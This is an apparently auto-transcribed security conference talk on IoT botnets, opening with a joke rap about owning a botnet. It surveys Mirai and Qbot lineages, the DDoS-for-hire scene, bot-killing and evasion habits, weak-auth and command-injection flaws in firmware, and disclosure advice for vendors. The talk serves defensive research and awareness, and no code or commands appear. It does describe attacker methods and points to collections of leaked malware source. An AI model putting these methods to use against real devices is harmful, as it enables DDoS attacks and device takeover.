 You see my botnet back there? I got Buddhist connected to my botnet Got hella Buddhist, hella Buddhist Buddhist, hella Buddhist, Buddhist Hella Buddhist, Buddhist I got Buddhist connected to my botnet Hanging out on hack forums Best believe I got warrants Telling all who listened at my botnet It's not boring Modified Mariah and I'm mixing in the minor Comes as no surprise Getting wrecked by a minor Cover up his drop bear Looking for me everywhere No I'm really not there Places I will not share Drop a couple backups I know you won't find me Buy a couple more smart balls Won't you kindly Screen him Captain Phillips Who the hell are you? Wonder why your toasters connected to Are you? Why your toasters toastin I'm using it for roastin Some kid got busy boasting Now his mode on smoking Keep the crypto flow And I need my money now But I gotta go Cause my mom said study now I'm calling all the shots And it's time for me to score I got a couple spots Hit me up on Discord Botnet I got hella booters Botnet Take over your rooters Botnet In your internet of things Botnet Man the shit hella stains Botnet I got hella booters Botnet Take over your rooters Botnet In your internet of things Botnet Man the shit hella stains Botnet I got hella booters Botnet Take over your rooters Botnet In your internet of things Well that was amazing well thanks so much Dave for that amazing intro I was not really sure what to think when I just got a PM saying that there was a theme song for my talk so hi everybody thanks for coming and hanging out let me hold on making sure everybody can hear me right old chat you can hear me say hi if you can just making sure got terrible microphone all right cool cool okay so let's get going um so yeah it's my talk um I'll just get right into it so who am I I'm net spooky senior reverse engineer at redacted company I primarily work on embedded devices firmware industrial control systems and taken apart proprietary network protocols you know me online as either net spooky or you and I contribute OSS tooling and other errata for third Intel RE and offensive security so all right we're still a little background on this so why do this talk so I know that there's a lot of people that you know have seen IOT botnets whether it be how you been affected by it or Steve people talking about them online and you know I had done a bit of my own research and I really kind of wanted to add you know a bit of perspective from my end on this because I think botnets are definitely still incredibly prevalent you know we are all affected by them whether we like it or not you know if your work slack is suddenly down because of somebody's fight on Xbox Live or Minecraft you know this is affecting you in some way but I don't think a lot of people take them as seriously a lot of people think it's like you know kitty stuff like script kitty stuff which is unfortunate because it definitely is something that is you know an issue that we all have to deal with and so I spent a good amount of time collecting malware sources so I started doing this in about 2018 and I had been collecting and developing tools to analyze analyze source code and analyze binaries which I'll get into later I still you a lot of the commonly exploitative vulnerabilities and wanted to know more about like why they were so prevalent like why why can you have 4 million hacked routers on your on your botnet doesn't you know it's insane to me so I wanted to inform others about the impact of their technology choices specifically firmware devs and people who are also in consumers and I also wanted to propose some ideas or how to address these and so I also this talk I should have given that said about a year ago or so it's just kind of been pushing on the back burner a bit but I tried to update it as much as I could and I also had to kind of cut out some of the parts which I'll talk about as I go through the yeah talk so here's the outline real quick so we're going to go over I keep on a history we're going to go over the actual botnet scene a little bit talk about the architecture of botnets and how they spread and propagate and then we're going to talk about the firmware vulnerabilities that enable them and steps to move forward for vendors so starting off just with I think on it history so what is an IOT botnet so if you're here watching for IOT Village you probably are aware of IOT issues and botnets in general but for those who haven't seen anything about them they're basically a network of hacked IOT devices that are basically internet connected devices like routers set up boxes webcams your toaster as a little toaster on here has a little script on how to scrape show Dan for links as routers but so they're used primarily for DDoS and they're sometimes used for crypto mining and also tunneling and proxy and traffic and so for this thing I'm gonna this this talk is kind of more of a cultural that is technical and I kind of want to be able to kind of go through a lot of the confusing nomenclature that surrounds this because there's there's a ton of it people call botnets by a million different names whether you're talking to a researcher or talking to a person who develops them there are a ton of different types so it's gonna go through a little bit of the history here so IOT botnets as they're known right now can be traced back to I guess 2014 ish when Lizard Squad came out with the I guess the botnet the malware with the most names like any malware them it's been termed a bash light it can also be called Lowe's bot Torless Liz kabob lizard stressor ball pit Gaffa get and just a bajillion other names and so it was spread by exploiting shell shock vulnerabilities and shell shock came out and busy box on a bunch of different devices so there was people were worse you know scanning the entire internet for shell shock vulnerabilities because they were all over the place but they were very very common in a lot of IOT devices and so when this was actually happening though there were actually a lot of different botnets there are bots that were being distributed because there hadn't been as many sources as there are now so you you've heard of Kai 10 which is like an IRC C2 based botnet that was spread a lot as well as like just pearl bots that are just literally DDoS bots that are written in pearl so the source code for this was leaked in 2015 and a lot of people started to work on it and so collectively it's hard to choose one name for them but collectively I would say these would be categorized as Cubot which is unrelated again to the Kak bot malware which people call Cubot and so yeah new devices that are still vulnerable to this exact same vulnerability appear online like newly to this day and so fast forward a couple years so Mira came out in 2016 and so it was used in some famous DDoS attacks like the Dyn DDoS attacks the ones on Brian Krebs and some other people but it was leaked shortly after some of the DDoS attacks happened and people started to immediately use it because it was a lot more streamlined than the previous versions of DDoS malware a lot of the stuff was in you know really simple one one file bots and servers very very basic stuff over telnet so Mira it was a lot more streamlined it was very modular so there's different files it made it easier for you to plug in new exploits into and also made it easier for you to have like access control for for users that were coming on and so it also had a bit better code it was definitely still not the best but it's a lot better than the previous code for Liskabob and Losebot so also had a SQL server on there which made it running the server a lot easier for them and so it seems like everybody has a botnet fork these days since then so there's other IOT botnists that are pretty major that have come out a big one that you may have heard of was Satori or FBOT or Rokiru and it's a pretty well-known Mira I fork that's a bit different from some of the other ones because a lot of them are kind of just very copy pasted stack overflow questions fit into some Golang and C code but so this one here had a bit the person who was doing it had definitely knew what they were doing a bit more than most people and that person actually just went to jail recently we've also seen Brickerbot which is the the botnet that would just basically infect and break IOT devices and there's been a few iterations of it there was a one in 2017 and then there was one recently I think it was like a 13 year old kid or something like that that did it as well a newer one really interesting is Kaiji Golang based cross-compiled SSH brute-forcer and actually installs a root kit or tries to to establish persistence which is really interesting I'll get into that more later access R is another one that I've seen I just threw in there because I didn't hear anybody talking about that one but it's more modular it's still crappy there is a Bitcoin miner botnet that you may have seen it's harder to do Bitcoin mining on a IOT device because they don't have as much CPU power and no GPU but they're still out there and then I also did a write-up on some Mira I variants that are targeting FPGAs and like some really exotic architectures which I have a link and citations at the end here or you can go on my website and see it so yeah botnet activity growth I mean like similarly to Q bot Mira just started popping up all over the place once it was leaked and that there became basically a huge marketplace for people who are trying to sell spots on the botnet right like there's reseller markets affiliate programs and incentives for having it grow and also booting itself you know DDoSing somebody their home router became a really common thing for people to actually you know try and do because it's just like a way to knock people offline especially if they're your math them and call a duty or something and so yeah it's basically just like the thing that people start to do and so like you know though as these things develop and grow like a thousand monkeys at a thousand terminals will eventually take out the the internet and that's kind of what's been happening and so we'll get a little bit into the scene here so the botnet scene at a glance there's entire communities that are dedicated specifically to just bottom one botnet or one botnet group and they are usually talking on discord sometimes their own forums or IRC these we definitely more IRC back in the day where people would have C2s connected to IRC but nowadays it's more discord there people are talking advertising is done on literally every single social media platform you can think of I think somebody found Pinterest that had somebody advertising botnets but yeah if you go on Instagram just literally search botnet or Q bot or botnet setup or YouTube you will find somebody advertising their latest slammin botnet and so booter time is generally sold people for DDoS through or through a web panel or through a talent interface but that's like the main things we go trying to do is just sell time on the botnet and so they will see here on the bottom it might be a little small for some of you but there's on just some advertisements for different botnets and also some videos on you know how to boot people off line and how to do it using just an Android and you know Best Boots 2020 it's you know these all have hundreds of thousands of views too so these are people that are really they're really going hard with the advertising so the sources so I talked about the sources that have kind of been modified to people they're usually distributed as zips or rawers or whatever and they are sold for about five hundred three hundred dollars USD from just what I've seen it's the authors that typically change very little of the codebase usually just involves something simple just changing the ASCII art or changing the variable names like control control f and replace sometimes they might even add a new exploit which is always interesting but exploits themselves to load bots are sometimes sold but a lot of them are literally like you can you can Google any part of the script and you will find the exploit DB link where they took it from the ones that are sold though from exploit DB or Metasploit modules are usually backdoor and it's really funny they just have like a base 64 blob that just like runs like import OS and then just run this or import sys and run this whatever and so when I was going through and finding a lot of these sources though I would find that when people would scan each other or rip off somebody or like you know somebody you had a fight with them they would leak each other's source code which is great for threat intel people and reverse engineers who want to figure out what's going on because they would just be like oh hey here's this person here's everything they've done here's their botnet and here's their code and you can kind of scoop it up and take a look at it and so selling spots primary source of revenue as I said they're typically sold in weekly monthly or lifetime plans you can see a breakdown of plans over here pretty cheap too the lifetime is always really funny to me because it really just means for the duration of the bot's lifetime botnet's lifetime and sometimes that does not last longer than the three three days or a month depending on how how bad their operation is so more more enterprising people people who are a bit more advanced might use a web stressor and they can sell access to that you know with users and everything for a web browser there's been a few big web stressors that have been taken down and some that are still up web stressor source leaked phones in the web stressor there's so much surrounding that it adds a bit of abstraction to it that makes it harder to manage and then yeah finally some people act as resellers and they get a cut of the sales over over time so who runs a botnet right iot botnet operators you know based on what I've seen in the scene I guess they're usually pretty young you know high school age sometimes college age there's somewhat experience with computers but they're usually not like developers they learn a lot through YouTube and through like text files which I have a collection of them in the GitHub that I'll explain in a little bit which are just tutorials and how to set them up basically the cost of spin up a rail box and how to like you know actually hold on one second how to actually call like just do the basic things that compile with GCC a lot of the times though they really have no clue what they're doing so you'll see people who are you know trying to get support for different botnets and they're you know really confused about GCC or you know what access control is but more sophisticated people might have a web stressor or an API like I said before people would use cryptocurrency instead of PayPal which is very common for some reason even though it's like tied to your bank directly in some cases though people will also use botnets for additional purposes like proxying traffic so sometimes you'll see fly by night sort of VPN operations that might be doing something shady like you know routing their traffic through routers and that's just their VPN somehow yeah so why run an IoT botnet so I mean just as much most malware is there's a lot of the similar reasons but there's a lot of stuff that comes with the fact that there's a lot of younger kids involved in this so they usually do it for either money you know because people can earn money from the cell the sale of a botnet spots a lot of people do this for attention people you know seek attention for stuff even if it's not even a DDoS and it's just like a regular production outage some people might say oh yeah I my group DDoS these people and you know we're gonna we're gonna extort them for money and then you look at their status pages like oh yeah sorry we had a blip in you know updating this thing and we're back now which is always awesome supply and demand it's definitely people who want you know to DDoS each other and so that's you know definitely wanted to meet that demand is something that you know it's it's good for any young entrepreneur revenge is also big I see a lot of people claiming that somebody you know docs them or DDoS them and they want to get back at them by getting their IP and booting them offline and then people are also inspired a lot by past attacks because people have seen what actually happens if somebody DDoS isn't takes out you know the internet they want to be you know doing that and also it's incredibly easy to set up an IT botnet so let's take a little bit of time to go over the architecture of DDoS botnet so as I said before earlier botnets use standalone bot files and C2 files that were just compiled with GCC or UC libc for cross compiling they're very very simple to set up and deploy some of them for C2 itself they used like IRC for command and control and they'd have IRC like very bare bones IRC clients connected to their within their their bots but me or I modernized it and they have actually a CT protocol that is used and they have like a SQL back end for tracking bots and all that so web stressors will use PHP and some other I guess API stuff for for managing the bots but it's definitely evolved a lot more than it used to be like five years ago which is interesting to see so the lifecycle of a botnet is usually very very short you don't see them for very long not going to be over a month or two basically somebody will set up a C2 on like a lax VPS host they'll scan for the phone devices they'll get some bots to their botnet will advertise their spots and then use it and then the takedown goes one of two ways either somebody like safe bad package report will tweet out the their their botnet to the tag of the web stressor I mean the site of the web host sorry and you know somebody will notice it and get it taken down or somebody else's botnet will start kicking their bots from the system and they won't be able to keep up and they'll lose power but then it'll just keep happening again this is just the same thing you see over and over again hold on one moment it's cool I didn't take a sip of water so this inevitably leads to a king of the hill game for botnets they're very territorial people are you know targeting one specific type of device with one specific vulnerability but they've coded into their variants and then when somebody else gets the same idea you know they'll start attacking and doing things like that getting their their bots on there anybody who touches the device is usually already has root access but they might have either like some weird file system or there's no way to really reconfigure it or they might not know how to reconfigure the device to kick everybody else out but basically every bot will only last as long as it can before somebody else takes its place and also there's really no repercussions for this so everyone's just kind of slamming on different IOT devices and picture it as a IOT operator or botnet operator watching their bot count drop so evasion is definitely an interesting aspect of this so there's there's a lot of very simplistic evasion that you'll see here this one up at the top here is somebody just renaming their process to drop bear which is I guess it works but it's also used by everybody so then everybody will just kill the drop the drop bear process once they log on but that's realistically this is not to hide from you know any sort of firewall or any sort of AV or anything it's only really used to evade other botnet operators and so those do things like you know the process masking they might learn about a different area of the file system that they can put a bot in they might hide a backup bot and help like potentially something like a cron job it's it's always very very primitive and like very very like bespoke and I actually had a whole code review section that could have actually been an entire talk but I had to cut it for time here but there's a lot of very very strange ways that people try to do evasion which I would love to talk about at another date and so bot killing as I said before people will do this you'll take a look at this if you can see it on the side here here's a you know an array that's just full of a ton of different bot names and every time they update this botnet which I have multiple versions of it they would add more and more of these but you'll see they'll do things like iterate from one to however many try to kill every process that's called that or every single version of this specific jack by nips or whatever two-face super will like be aware of different botnests that are operating and what they name them and then put them into their scripts and it's like a cat and mouse game because nobody can fit everything in there otherwise their binary is going to be full of strings that ultimately are going to get detected by people who are reverse engineering the malware and so so not some not most nearly all bots and c2s I would say all have really really silly vulnerabilities that make them incredibly easy to knock off line and I don't really see too many of these techniques really utilized or advertised by people but in my next slide I'll show you something interesting I guess so here's my non-live demo for a c2 killer so this is something that I found I definitely was not the first person to find this but it was part of my testing when I was testing out these different things when I was researching it's incredibly easy to kill you know mirai c2s this is a you know take your screenshots or whatever I really put this out on Twitter at some point um but yeah this is if you send this to either the admin port or to the heartbeat protocol port it just it just segfalls the uh the mirai c2 and I've never seen anybody fix this this is in every version of mirai that I've seen um some people have had claimed that it was fixed but I still after reviewing every single one of them that I could find I've never seen that and so take a bit of a second um the last little bit on the bonnet scene here um you know when I was going through and doing this work I ended up creating a tool um to help me track all this stuff and I put it out on github it hasn't been updated for a bit because it just I've gotten too many other projects to do but it's um it's a static analysis and classification tool for for zip files and binaries and things like that it just feeds it all into a big elastic search database um I definitely I'm taking the next week off of work so I'm gonna I'm gonna take some time to uh push my big update to this but if you want to check it out definitely do it I have some new things like an api um different symbol hashes and key extraction techniques in there um but it was just mainly for me for a fast analysis because I was you know I had uh it's basically feeding in either new new source code or new bot binaries into this and and just tracking them but it works for other malware too um also if you want to um I had a twitter that was deleted by twitter for some reason that um it's called threat land but that was the name of the project that I used to track all these sources so I have like every mirai and qbot and other botnet just even beyond iot I tracked them all in a big repo called tlbots and I have a few other repos if you want to check them out for like fraud tools and stuff but um yeah there's literally clone that there's like a gigabyte worth of zip files of every malware source code that I could find um yeah so now we're going to get into talking about vulnerabilities and this is kind of this this aspect of it is a bit more about like stuff for devs um because I wanted to be able to to give info for developers who are working on iot devices to take all of what I just said there and put it into context for their actual security architecture um so let me take another sip of water um so okay so we're here we're peering into the void here so here is uh if you ever have gone on grain noise they have a lot of tags for uh different either vulnerabilities themselves um of the people are scanning for or just classes of you know malicious traffic um if you do a search just for mirai uh you'll see here it's very very tiny with there's there's four and a half million results for unique devices that have been scanning with mirai like traffic so that gives you a a rough example of of how many people are or how many devices are actually infected and actively scanning um and then the other one is just a show damn search for this hacked router help sos had dupe password um thing which there are still this is I think that that hack happened like four years ago and there's still 6500 devices that have been hacked uh and have this host name so it's uh always heartwarming to see I guess um so what types of volumes are exploited by these botnets so it's always very basic stuff here we're talking about weak auth and auth bypass so there's either admin admin as the credentials or there's that uh a page that you can you know run os commands on that doesn't actually need a password to be you know uh interacted with um there's also command injection like shell shock and and other really silly uh command injection stuff um there's also a lot of common exploits in specific services and libraries like the real tech upnp sdk which had a a bone that was like in everything there's so many different uh devices um go ahead webs and think php also have uh bones that were in a lot of places like thousands and thousands of stuff were affected by go ahead um and so more rare though you'll see actual shell code and binary exploits um which is always interesting to see because you know you'll have devices that you know are using like the same base address and they can just do a shell code exploit um very very easily um but it they're not as common as um as you think and I think it might be because people don't know how to code a shell code um or how to inject shell code like with a in C like when they're writing their box so who knows but you'll see them in bot loaders for sure um and a lot of other vectors include previously compromised devices so like if you people sell lists of compromised devices um for specific category of devices um which there might I don't actually know if there is any in my repo but um I have seen a bunch of them where people are basically just passing those things around um so we're looking at the most targeted devices here so if you want to see you know what bones are most leveraged by these these botnets um I have a command table or a table here of basically I went through every every source code that we we could find there's like several hundred uh unique source codes and these are the the main ones that people are using um a lot of them here don't actually have any like CVE or CPE or any vendor acknowledgement so you can only really find them by kind of looking up what the traffic is or what the command injection attempt was on you know in your log files um actually more than half of these don't have any CVE at all um with AV tech one which I think is being used in um in the IOT CTF right now doesn't doesn't have a CVE or anything and it's just a blog post that you know people have written about it um same with like uh you know some of these neckier ones the neckier dgn 1000 that's a huge one that people have exploited I've never seen a CVE for um you know the h-napped background like ziksel stuff uh even uh actually go-ahead websites um but here these don't even ssh or telnet brute force stuff this is like like a lot of this stuff here like buffer overflow or like command injection some of these aren't even being tracked by anybody um so when a new exploit comes out though bot scan is really just immediately start trying to load bots with like whatever p-o-c people have um and it's usually IOT bots and it's very uh annoying um so the infections spill over from that so like these malware families are you know running on a super diverse array of architectures like there's every architecture you can think of is has a mirai variant for it at this point um because of cross compiling but this means that this can affect other hosts that aren't IOT and so people will try to use and they'll try to get mirai onto things like web servers using like Drupal get-in or patchy struts or you know uh couch db or whatever thing is running um they're gonna try to do that to have that be the scanner as well um so these sort of infections spill over is is really common and you'll see sometimes like IOT botnets are using Drupal get-in and you're like what router is running Drupal it's because they're trying to get onto everything um and so um why are these devices so easy to exploit um and so we've talked we were talking about this in the last um talk here about uh you know supply chain issues and so there's it's very difficult to validate supply chain is a big one there's vulnerable software and libraries that people use um they might not be able to change or have the the people to even you know make the changes for it easy to guess default passers is a huge one um devices by default to import forwarding and listening on the internet giant list of bone devices are passed around which makes it even easier for people who don't know what they're doing to just start exploiting um and then it all comes down to insufficient or non-existent security practices and development and so we're gonna get a little bit into firmware bones now and and security practices so um you'll see there was a awesome talk I think two years ago schmoo khan um about um firmware bones by CITL so there's a lot of stuff like vendor security practices on a binary level are like they're you know almost non-existent and there's even regression analysis to show that firmware is actually becoming worse and having more vulnerabilities introduced to them in a 15-year data set which is insane to me um so you see here here's like every vendor that they had um looked at and you see anything that's closer to the edge here is going to have more of these uh things like stack guards or non-executable stack or railroad ASLR things that are closer to the edge are scoring higher and actually that means that more binaries have these mitigations in place but if you can see there's very very few that actually have anything on the graph um and then the ones that do they only have like one or two and there's very few um it's it's kind of sad you want this whole all these things to be blue all the way blue and there's like lines of blue um which is really uh disheartening here um and so why is firmware so difficult to maintain so there's so many reasons for it and I used to have done firmware development before um for embedded devices and you know even what I the experience that I had doing that is still you know I could see all the echoes of this throughout the process right because re-architecting cost is is a huge thing cost is usually the biggest factor for you know why things aren't changing um but you can also be locked into a vendor contract you can be locked into like a middleware contract so you can only use drivers for this one you know piece of your of your kit um and you have to use it for a certain period of time um you might have unsupported chips or hardware to work with um another huge thing is outdated tool chains you might be using some tool chain from like 2005 and that's how you build everything in 2020 um there's also a lot of things like hardware restraints which you know sometimes you might not like your hardware itself might not support like the ssl version that you need to that was an issue that I've had to deal with before trying to figure out how you can you know gerry rig a new ssl and christian scheme and support newer versions of tls in in firmware that's you know 15 years old um sometimes you also need to maintain backwards compatibility which is a big thing um to make this stuff really it makes it very very hard you have to include stuff that you might not want to um a lot of stuff though is is a lack of dependable updates for for users to update their devices um so even if you have you know all the other things in place here um it's sometimes people don't have like a way to actually update the devices without some complicated process poor communication channels even tell people about vulnerabilities is also a big thing and vendors might not have any sort of like channels for reporting bugs or telling people about bugs um as well and then you know lack of modern security measures um like secure boot or binary hardening where you talk about before the code signing are not going to really be in place and it's hard to get those things back into your you know pipeline if you have to do a bunch of testing and you only have a couple people working on the thing um and so why do we see a lot of this older stuff working so there's some sometimes you'll actually see q bots or kite n bots or even pro bots um trying to exploit stuff in your logs and you know if you download binary um and it's because the vulnerabilities are still there right and so this is something that I had um actually distilled analysis analogy from mud right in mining there's indicator minerals that can prove that there are other um things that you um to call there's like a like say you're looking for like diamonds or something um there's uh like indicator materials that prove that this might be there the thing that you're looking for might be there and so the um it's called the security vulnerabilities that we're seeing are showing that there are not as many um security practices that are being followed which means that the older vulnerabilities are still going to be able to work right so like we're seeing like you know there's still command injection here in 2020 and then you can still run a q bot or a pro bot on this device this means that there's really not anything that's going into the actual process of making the binary or the devices any uh any more secure um and what's interesting is this is rare in other classes of malware like say for desktop computers because there's no patch really that you can apply to one specific device or whatever um so each time that there's a new volume that comes out there's all these new devices that are added to the pool but there's still all the routers from 2014 that had shell shock vulnerabilities in them and dvrs and still have off bypass in them and those are all just getting added to the pool so here we are just trying the same old techniques and they're still getting the actual devices that they would have exploited you know before um so it's it's kind of uh it's kind of frustrating um so moving forward this is the big thing for vendors and people who are you know developers um of firmware and embedded devices so what can we actually do to solve any of these problems here so we can only really fix them by having better developer development practices for security by meeting the developers and the vendors where they're at because they're we want them to be you know on top of their game and actually doing you know the the work that we'd like them to put in so that our you know toaster isn't you know d-dossing somebody because because of some mirror ivy variant from this run by like a 14 year old kid um so we have to like actually talk to them talk to the vendors the way that they things that they already know um and in their the way that they're already developing things so for vendors i guess my big advice here is to invest in developer training and to establish best practices and create security testing pipelines um and encourage researchers to actually find bones and disclose them properly um we can mitigate some of the existing bones by encouraging safer use iot devices but it only works so much because imagine trying to explain to your parents uh how to you know turn off port forwarding on their um on their router right like they're not really going to understand it in the way that you might I mean they might but they um you know it's sometimes hard to get end users to actually follow your guidelines at all they might not even be able to to be aware of it um but that's one specific way that we can mitigate that um establishing best practices though is a thing i wanted to highlight for a second here um so like auditing your development cycle itself um it definitely depends on what you're building and you have to tailor it to that and be able to audit and say hey yeah we are using c we are using you know this toolchain we're using either gcc or you know uh um uc libc or whatever um to uh you know develop our firmware um but there are there are best practices for these things so oas um something that i had when i was doing firmware stuff i had made um developers i had them look at these some of these cheat sheets for for oas when like toolchain hardening on like input tenetization for for web apps and and you know how to do other things to you know the best the best practices that there are and there's tons of different ones like this i just post to a lot because it's um it's you know very accessible for a lot of people and it's free um another big thing is cis benchmarks um you know there's depending on what you're building there are benchmarks for security that you can follow um which are super duper useful um you know you can even automate that i had done like ansible cis benchmarks before um you can build those into toolchains pretty easily um and then also if you really need to hire a consultant to come in and do all this work with you and work through it with your team that's definitely a huge thing for uh for vendors um vulna disclosure though is probably my favorite one to talk about and the biggest one so when you do find people that are actually poking at your stuff allow them to disclose vulnerabilities please if you are a vendor and you're listening there are ways now it's 2020 you can have a vdp you can can't have a bug bounty you have to go through the channel the proper channels and make sure if it's right for you but there are a ton of resources disclose.io has like really good legal language and other things resources for vendors um but yeah people who do irt research sometimes either get no response or they get you know a summits you know get sued for something um establish security contact though and listen to email there's security.txt is a really easy way on your vendor website to just have an email that somebody who has an issue or a vulnerability can talk to and not feel like they're you know trying to chase you down because like how many times do you see people on twitter going hey does anybody have a vendor contact for like this company and like nobody responds it's like if we have to go on twitter to to ask about this not only does it draw more attention to your you know the vulnerability but it also makes you look bad so definitely um you know keep up with that stuff um work with researchers too because people who are bringing stuff up to you they want to help you if somebody wants to just use your device or crypto mining or you know to DDoS you know some kid on minecraft they're not going to tell you about it so if you have a researcher that's here and talking to you they want to help you and you should definitely you know heed their advice um and have some open channels with your customers too to have the word out about vulnerabilities like if you either you do an internal thing or you submit to cvs and then you post them on twitter whatever you do just have some things so people can know update their devices um and ultimately all these are elements of a vulnerability disclosure program so if you put this all together you have you know the baseline for what you need to actually have one which is awesome and so I done a uh a little quick question out there on twitter which you can see um I have a link here um but these are some community suggestions for what vendors can do um you know everything from automatic updates to I like the uh make a security enamed person's problem um so like having say like I don't know like sherry has to deal with the you know firmware bones that come in so you know talk to her if there's an issue um you know other things like minimizing attack surfaces code signing like a lot of this stuff is going to be part of other um you know best practices that you're going to have to implement but these are all um you know elements of things that might be good for you to consider moving forward um default settings definitely should be sane and with security in mind and also don't reinvent the wheel so final thoughts here I got two minutes left just about so we want to make it less easy for people to run botnets right overall um the supplies already there the demand is great everything is set up people can off the shelf you know get several thousand bots on botnet in an afternoon um botnet authors are definitely getting a lot smarter um people are using the messy landscape of this to take control of it like if you see with a kaiji botnet which is definitely a lot more advanced than previous stuff um people are are going to be using this for more nefarious purposes and because there's so much um going on in the space um it's very hard to pick out who is either a nation state trying to get you know access into your router or just some random kid who has no idea what they're doing um and new devices and architectures are always being targeted as I said FPGAs there's tons of new stuff you can read that analysis that I wrote um you know if you don't act soon like the new products that you put out are already going to be dead on arrival um and exploitable once they come out um and so yeah um the q and a for this is going to be done in the defcon discord as you might have seen in the twitch chat so if you have questions or you can always hit me up on twitter uh at net spooky um you know my dms are open there um I got some shoutouts real quick shout out to the safari zone crew which is the people that have always been there to look for weird stuff on the internet hopefully we'll have a zine coming out soon um threat land everybody who helped out with that project to collect sources and of course the entire community of flood crowd uh special shout out to hermit for helping me go through so much of this and be such an awesome person for um you know looking at logs and other weird stuff oops um yeah like being able to tell me a lot a lot of interesting things that she has found um andrew morris um my gray noise thanks so much for letting me um use your data set too before it's even publicly available um thanks to mudge for coming in uh hot with some hot takes for me um when I was building this talk um check out ilia's iot village talk on emulating iot devices and malware because we actually did a lot of that when I was writing this talk and then thanks also to dade for that theme song um so i'll have slides out i'll tweet them out just follow me on twitter and you'll see um i have citations here if you want to read them but yeah thanks everybody